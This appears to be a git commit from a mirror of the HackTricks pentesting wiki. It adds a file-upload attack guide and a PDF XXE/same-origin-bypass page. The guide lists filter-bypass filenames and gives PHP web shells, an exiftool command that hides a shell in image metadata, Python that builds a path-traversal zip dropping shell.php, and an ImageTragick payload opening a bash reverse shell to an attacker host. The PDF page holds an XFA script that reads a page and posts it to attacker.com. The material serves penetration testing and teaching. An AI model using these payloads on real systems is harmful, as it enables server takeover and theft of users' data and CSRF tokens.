mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [master] 381 pages modified
This commit is contained in:
parent
b044612133
commit
24e35eb4ed
6 changed files with 379 additions and 4 deletions
|
@ -288,7 +288,8 @@
|
|||
* [Exploiting \_\_VIEWSTATE parameter](pentesting-web/deserialization/exploiting-__viewstate-parameter.md)
|
||||
* [Email Header Injection](pentesting-web/email-header-injection.md)
|
||||
* [File Inclusion/Path traversal](pentesting-web/file-inclusion.md)
|
||||
* [File Upload](pentesting-web/file-upload.md)
|
||||
* [File Upload](pentesting-web/file-upload/README.md)
|
||||
* [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md)
|
||||
* [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling.md)
|
||||
* [IDOR](pentesting-web/idor.md)
|
||||
* [JWT Vulnerabilities \(Json Web Tokens\)](pentesting-web/hacking-jwt-json-web-tokens.md)
|
||||
|
|
230
pentesting-web/file-upload/README.md
Normal file
230
pentesting-web/file-upload/README.md
Normal file
|
@ -0,0 +1,230 @@
|
|||
# File Upload
|
||||
|
||||
## File Upload General Methodology
|
||||
|
||||
1. Try to upload a file with a **double extension** \(ex: _file.png.php_ or _file.png.php5_\).
|
||||
* PHP extensions: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, ._phps_, ._pht_, _.phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc_
|
||||
* ASP extensions: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .asp, .cer, .shtml_
|
||||
2. Try to **uppercase some letter\(s\)** of the extension. Like: _.pHp, .pHP5, .PhAr ..._
|
||||
3. Try to upload some **double \(or more\) extension** \(useful to bypass misconfigured checks that test if a specific extension is just present\):
|
||||
1. _file.png.php_
|
||||
2. _file.png.txt.php_
|
||||
4. Try to upload some **reverse double extension** \(useful to exploit Apache misconfigurations where anything with extension _.php_, but **not necessarily ending in .php** will execute code\):
|
||||
* _ex: file.php.png_
|
||||
5. Double extension with **null character:**
|
||||
1. _ex: file.php%00.png_
|
||||
6. **Add some especial characters at the end** of the extension_: %00, %20, \(several dots\)...._
|
||||
1. _file.php%00_
|
||||
2. _file.php%20_
|
||||
3. _file.php...... --> In Windows when a file is created with dots at the end those will be removed \(so you can bypass filters that checks for .php as extension\)_
|
||||
4. _file.php/_
|
||||
5. _file.php.\_
|
||||
7. Bypass Content-Type checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
|
||||
8. Bypass magic number check by adding at the beginning of the file the **bytes of a real image** \(confuse the _file_ command\). Or introduce the shell inside the **metadata**: `exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`
|
||||
1. It is also possible that the **magic bytes** are just being **checked** in the file and you could set them **anywhere in the file**.
|
||||
9. Using **NTFS alternate data stream \(ADS\)** in **Windows**. In this case, a colon character “:” will be inserted after a forbidden extension and before a permitted one. As a result, an **empty file with the forbidden extension** will be created on the server \(e.g. “file.asax:.jpg”\). This file might be edited later using other techniques such as using its short filename. The “**::$data**” pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions \(.e.g. “file.asp::$data.”\)
|
||||
10. **Upload** the backdoor with an **allowed extension** \(_png_\) and pray for a **misconfiguration** that executes the backdoor
|
||||
11. Find a vulnerability to **rename** the file already uploaded \(to change the extension\).
|
||||
12. Find a **Local File Inclusion** vulnerability to execute the backdoor.
|
||||
13. **Possible Information disclosure**:
|
||||
1. Upload **several times** \(and at the **same time**\) the **same file** with the **same name**
|
||||
2. Upload a file with the **name** of a **file** or **folder** that **already exists**
|
||||
3. Uploading a file with **“.”, “..”, or “…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in “/www/uploads/” directory, the “.” filename will create a file called “uploads” in the “/www/” directory.
|
||||
4. Upload a file that may not be deleted easily such as **“…:.jpg”** in **NTFS**. \(Windows\)
|
||||
5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. \(Windows\)
|
||||
6. Upload a file in **Windows** using **reserved** \(**forbidden**\) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
|
||||
|
||||
Try also to **upload an executable** \(.exe\) or an **.html** \(less suspicious\) that **will execute code** when accidentally opened by victim.
|
||||
|
||||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files" %}
|
||||
|
||||
If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).
|
||||
If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
|
||||
|
||||
The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** \(executing it with php, or including it inside a script...\)
|
||||
|
||||
The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
|
||||
|
||||
**Check a lot of possible file upload vulnerabilities with BurpSuit plugin** [**https://github.com/modzero/mod0BurpUploadScanner**](https://github.com/modzero/mod0BurpUploadScanner) **or use a console application that finds which files can be uploaded and try different tricks to execute code:** [**https://github.com/almandin/fuxploider**](https://github.com/almandin/fuxploider)\*\*\*\*
|
||||
|
||||
### **wget File Upload/SSRF Trick**
|
||||
|
||||
In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**
|
||||
The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** \(as in this example **".gif"** is a **valid** extension\) but `wget` will **rename** the file to **"A"\*232+".php"**.
|
||||
|
||||
```bash
|
||||
#Create file and HTTP server
|
||||
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
|
||||
python3 -m http.server 9080
|
||||
```
|
||||
|
||||
```bash
|
||||
#Download the file
|
||||
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
|
||||
The name is too long, 240 chars total.
|
||||
Trying to shorten...
|
||||
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
|
||||
--2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
|
||||
Connecting to 127.0.0.1:9080... connected.
|
||||
HTTP request sent, awaiting response... 200 OK
|
||||
Length: 10 [image/gif]
|
||||
Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’
|
||||
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s
|
||||
|
||||
2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
|
||||
```
|
||||
|
||||
Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
|
||||
|
||||
## From File upload to other vulnerabilities
|
||||
|
||||
* Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
|
||||
* Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
|
||||
* Set **filename** to `<svg onload=alert(document.comain)>` to achieve a XSS
|
||||
* Set **filename** to `; sleep 10;` to test some command injection \(more [command injections tricks here](../command-injection.md)\)
|
||||
* \*\*\*\*[**XSS** in image \(svg\) file upload](../xss-cross-site-scripting/#xss-uploading-files-svg)
|
||||
* **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers)
|
||||
* \*\*\*\*[**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)\*\*\*\*
|
||||
* \*\*\*\*[**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
|
||||
* [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
|
||||
* If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery.md). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
|
||||
* [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
|
||||
|
||||
Here’s a top 10 list of things that you can achieve by uploading \(from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)\):
|
||||
|
||||
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
|
||||
2. **SVG**: Stored XSS / SSRF / XXE
|
||||
3. **GIF**: Stored XSS / SSRF
|
||||
4. **CSV**: CSV injection
|
||||
5. **XML**: XXE
|
||||
6. **AVI**: LFI / SSRF
|
||||
7. **HTML / JS** : HTML injection / XSS / Open redirect
|
||||
8. **PNG / JPEG**: Pixel flood attack \(DoS\)
|
||||
9. **ZIP**: RCE via LFI / DoS
|
||||
10. **PDF / PPTX**: SSRF / BLIND XXE
|
||||
|
||||
## Zip File Automatically decompressed Upload
|
||||
|
||||
If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
|
||||
|
||||
### Symlink
|
||||
|
||||
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
|
||||
|
||||
```text
|
||||
ln -s ../../../index.php symindex.txt
|
||||
zip --symlinks test.zip symindex.txt
|
||||
```
|
||||
|
||||
### Decompress in different folders
|
||||
|
||||
The decompressed files will be created in unexpected folders.
|
||||
|
||||
One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.
|
||||
|
||||
An automated exploit to create this kind of files can be found here: [https://github.com/ptoomey3/evilarc](https://github.com/ptoomey3/evilarc)
|
||||
|
||||
```python
|
||||
python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
|
||||
```
|
||||
|
||||
Some python code to create a malicious zip:
|
||||
|
||||
```python
|
||||
#!/usr/bin/python
|
||||
import zipfile
|
||||
from cStringIO import StringIO
|
||||
|
||||
def create_zip():
|
||||
f = StringIO()
|
||||
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
|
||||
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
|
||||
z.writestr('otherfile.xml', 'Content of the file')
|
||||
z.close()
|
||||
zip = open('poc.zip','wb')
|
||||
zip.write(f.getvalue())
|
||||
zip.close()
|
||||
|
||||
create_zip()
|
||||
```
|
||||
|
||||
To achieve remote command execution I took the following steps:
|
||||
|
||||
1. Create a PHP shell:
|
||||
|
||||
```php
|
||||
<?php
|
||||
if(isset($_REQUEST['cmd'])){
|
||||
$cmd = ($_REQUEST['cmd']);
|
||||
system($cmd);
|
||||
}?>
|
||||
```
|
||||
|
||||
2. Use “file spraying” and create a compressed zip file:
|
||||
|
||||
```text
|
||||
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
|
||||
root@s2crew:/tmp# ls *.php
|
||||
simple-backdoor.php xxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
|
||||
xxAcmd.php xxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
|
||||
xxAxxAcmd.php xxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
|
||||
root@s2crew:/tmp# zip cmd.zip xx*.php
|
||||
adding: xxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
|
||||
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
|
||||
root@s2crew:/tmp#
|
||||
```
|
||||
|
||||
3.Use a hexeditor or vi and change the “xxA” to “../”, I used vi:
|
||||
|
||||
```text
|
||||
:set modifiable
|
||||
:%s/xxA/..\//g
|
||||
:x!
|
||||
```
|
||||
|
||||
Done!
|
||||
|
||||
Only one step remained: Upload the ZIP file and let the application decompress it! If it is succeeds and the web server has sufficient privileges to write the directories there will be a simple OS command execution shell on the system:
|
||||
|
||||
[![b1](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1-300x106.png)](https://blog.silentsignal.eu/wp-content/uploads/2014/01/b1.png)
|
||||
|
||||
**Reference**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
|
||||
|
||||
## ImageTragic
|
||||
|
||||
Upload this content with an image extension to exploit the vulnerability **\(ImageMagick , 7.0.1-1\)**
|
||||
|
||||
```text
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
|
||||
pop graphic-context
|
||||
```
|
||||
|
||||
## Embedding PHP Shell on PGN
|
||||
|
||||
The primary reason putting a web shell in the IDAT chunk is that it has the ability to bypass resize and re-sampling operations - PHP-GD contains two functions to do this [imagecopyresized](http://php.net/manual/en/function.imagecopyresized.php) and [imagecopyresampled](http://php.net/manual/en/function.imagecopyresampled.php).
|
||||
|
||||
Read this post: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
|
||||
|
||||
## Polyglot Files
|
||||
|
||||
Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a [GIFAR](https://en.wikipedia.org/wiki/Gifar) is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.
|
||||
|
||||
Polyglot files are often used to bypass protection based on file types. Many applications that allow users to upload files only allow uploads of certain types, such as JPEG, GIF, DOC, so as to prevent users from uploading potentially dangerous files like JS files, PHP files or Phar files.
|
||||
|
||||
This helps to upload a file that complins with the format of several different formats. It can allows you to upload a PHAR file \(PHp ARchive\) that also looks like a JPEG, but probably you will still needs a valid extension and if the upload function doesn't allow it this won't help you.
|
||||
|
||||
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
|
||||
|
||||
|
||||
|
136
pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
Normal file
136
pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
Normal file
|
@ -0,0 +1,136 @@
|
|||
# PDF Upload - XXE and CORS bypass
|
||||
|
||||
#### Content copied from [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)
|
||||
|
||||
### Javascript function in Reader can be used to read data from external entities \(CVE-2014-8452\)
|
||||
|
||||
Status: Fixed
|
||||
Reality: Not Fixed
|
||||
|
||||
This one is about a simple XXE I discovered.
|
||||
I read the paper "Polyglots: Crossing Origins by Crossing Formats", where they discussed a vulnerability in
|
||||
XMLData.parse. It was possible to use external entities and reference them.
|
||||
I read the specification and it turns out there are more functions than "parse" to read XML.
|
||||
I created a simple xml file, which references an url from the same domain and parsed it with loadXML.
|
||||
It worked:
|
||||
|
||||
![](https://4.bp.blogspot.com/-is4Q5hSZk-Y/VIwdzdAckWI/AAAAAAAAACI/OAzBs9Q-T50/s1600/xxe.png)
|
||||
|
||||
```text
|
||||
7 0 obj
|
||||
<<
|
||||
/Type /Action
|
||||
/S /JavaScript
|
||||
/JS (
|
||||
var cXMLDoc = '<?xml version="1.0" encoding="ISO-8859-1"?><foo>muh</foo>'
|
||||
var cXMLDoc2 = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ENTITY aaaa SYSTEM "http://example.com">]><ab>&aaaa;</ab>'
|
||||
xml = XMLData.parse(cXMLDoc,false);
|
||||
xml.loadXML(cXMLDoc2,false,true);
|
||||
)
|
||||
>>
|
||||
endobj
|
||||
```
|
||||
|
||||
|
||||
The Impact is limited because
|
||||
o\) it is limited to same origin
|
||||
o\) HTML Pages break the xml
|
||||
o\) Dynamic Entities are not supported
|
||||
o\) I had the idea to use a utf-16 xml to avoid breaking the xml structure, but I it didn't work.
|
||||
|
||||
But it still can be used to read JSON.
|
||||
|
||||
### Same origin policy bypass in Reader \(CVE-2014-8453\)
|
||||
|
||||
Status: fixed
|
||||
Reality: fixed but same origin still vulnerable!
|
||||
|
||||
In my opinion this is the most powerful vulnerability. Even without the Origin Bypass it shows you
|
||||
how powerful/terrifying PDF can be.
|
||||
Many people know that PDF supports a scripting language called Javascript but there is another one.
|
||||
It is mentioned in the specification for XFA, a file type also supported by the adobe reader.
|
||||
It is called formcalc and it not that powerful. It is used for simple math calculation. But in the adobe specification
|
||||
there are three additional functions: 'GET','POST' and 'PUT'. Yes, their names speak for themselves.
|
||||
'GET' has one parameter: an url. It will use the browser \(YEAH COOKIES\) to retrieve the url and return the content of it.
|
||||
We can then use 'POST' to send the return content to our own server:
|
||||
|
||||
var content = GET\("myfriends.php"\);
|
||||
Post\("http://attacker.com",content\);
|
||||
|
||||
These functions are same origin, so a website needs to allow us to upload a PDF. Thats not that unrealistic for
|
||||
most websites. Attacker.com is not same origin, so you need to setup a crossdomain.xml, as usual with Adobe products.
|
||||
|
||||
To sum up: This is not a bug, this is a feature. As soon as you are allowed to upload a PDF on a website,
|
||||
you can access the website in the context of the user, who is viewing the PDF. Because the requests are issued
|
||||
by the browser, cookies are sent too. You can also use it to break any CSRF Protection by reading the tokens.
|
||||
|
||||
```text
|
||||
|
||||
% a PDF file using an XFA
|
||||
% most whitespace can be removed (truncated to 570 bytes or so...)
|
||||
% Ange Albertini BSD Licence 2012
|
||||
|
||||
% modified by insertscript
|
||||
|
||||
%PDF-1. % can be truncated to %PDF-\0
|
||||
|
||||
1 0 obj <<>>
|
||||
stream
|
||||
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
|
||||
<config><present><pdf>
|
||||
<interactive>1</interactive>
|
||||
</pdf></present></config>
|
||||
<template>
|
||||
<subform name="_">
|
||||
<pageSet/>
|
||||
<field id="Hello World!">
|
||||
<event activity="initialize">
|
||||
<script contentType='application/x-formcalc'>
|
||||
var content = GET("myfriends.php");
|
||||
Post("http://attacker.com",content);
|
||||
</script>
|
||||
</event>
|
||||
</field>
|
||||
</subform>
|
||||
</template>
|
||||
</xdp:xdp>
|
||||
endstream
|
||||
endobj
|
||||
|
||||
trailer <<
|
||||
/Root <<
|
||||
/AcroForm <<
|
||||
/Fields [<<
|
||||
/T (0)
|
||||
/Kids [<<
|
||||
/Subtype /Widget
|
||||
/Rect []
|
||||
/T ()
|
||||
/FT /Btn
|
||||
>>]
|
||||
>>]
|
||||
/XFA 1 0 R
|
||||
>>
|
||||
/Pages <<>>
|
||||
>>
|
||||
>>
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
After I found these functions, I found a same origin policy bypass. This makes it possible to use a victim browser
|
||||
as a proxy \(@beef still working on the module^^\)
|
||||
|
||||
The bypass is really simple:
|
||||
|
||||
1. User A loads evil.pdf from http://attacker.com/evil.pdf
|
||||
2. Evil.pdf uses formcalc GET to read http://attacker.com/redirect.php
|
||||
3. redirect.php redirects with 301 to http://facebook.com
|
||||
4. Adobe reader will follow and read the response without looking for a crossdomain.xml.
|
||||
5. evil.pdf sends the content retrieved via POST to http://attacker.com/log.php
|
||||
|
||||
Note that using this technique you can steal the CRSF tokens of a page and abuse CSRF vulns.
|
||||
|
||||
This simple bypass is fixed now. I hope they going to implement a dialog warning for same origin requests too.
|
||||
|
|
@ -134,7 +134,7 @@ You can use applications like [http://webhook.site](http://webhook.site/) to fin
|
|||
|
||||
## Exploitation
|
||||
|
||||
### [Wget file upload](file-upload.md#wget-file-upload-ssrf-trick)
|
||||
### [Wget file upload](file-upload/#wget-file-upload-ssrf-trick)
|
||||
|
||||
### file://
|
||||
|
||||
|
|
|
@ -330,6 +330,14 @@ You could also try to **execute commands** using the PHP "expect" wrapper:
|
|||
|
||||
**Note the first line of the read file or of the result of the execution will appear INSIDE the created image. So you need to be able to access the image SVG has created.**
|
||||
|
||||
### **PDF - File upload**
|
||||
|
||||
Read the following post to **learn how to exploit a XXE uploading a PDF** file:
|
||||
|
||||
{% page-ref page="file-upload/pdf-upload-xxe-and-cors-bypass.md" %}
|
||||
|
||||
|
||||
|
||||
### Content-Type: From x-www-urlencoded to XML
|
||||
|
||||
If a POST request accepts the data in XML format, you could try to exploit a XXE in that request.
|
||||
|
|
|
@ -339,7 +339,7 @@ Check for ****[**SQL INSERT INTO Injections.**](../../pentesting-web/sql-injecti
|
|||
|
||||
Check for this vulnerabilities:
|
||||
|
||||
* \*\*\*\*[**File Upload**](../../pentesting-web/file-upload.md)\*\*\*\*
|
||||
* \*\*\*\*[**File Upload**](../../pentesting-web/file-upload/)\*\*\*\*
|
||||
|
||||
## **User input Web Vulnerabilities list**
|
||||
|
||||
|
@ -357,7 +357,7 @@ Check for this vulnerabilities:
|
|||
* \*\*\*\*[**Deserialization**](../../pentesting-web/deserialization/)\*\*\*\*
|
||||
* \*\*\*\*[**Email Header Injection**](../../pentesting-web/email-header-injection.md)\*\*\*\*
|
||||
* \*\*\*\*[**File Inclusion**](../../pentesting-web/file-inclusion.md)\*\*\*\*
|
||||
* \*\*\*\*[**File Upload**](../../pentesting-web/file-upload.md)\*\*\*\*
|
||||
* \*\*\*\*[**File Upload**](../../pentesting-web/file-upload/)\*\*\*\*
|
||||
* \*\*\*\*[**IDOR**](../../pentesting-web/idor.md)\*\*\*\*
|
||||
* \*\*\*\*[**JWT Vulnerabilities**](../../pentesting-web/hacking-jwt-json-web-tokens.md)\*\*\*\*
|
||||
* \*\*\*\*[**NoSQL Injection**](../../pentesting-web/nosql-injection.md)\*\*\*\*
|
||||
|
|
Loading…
Reference in a new issue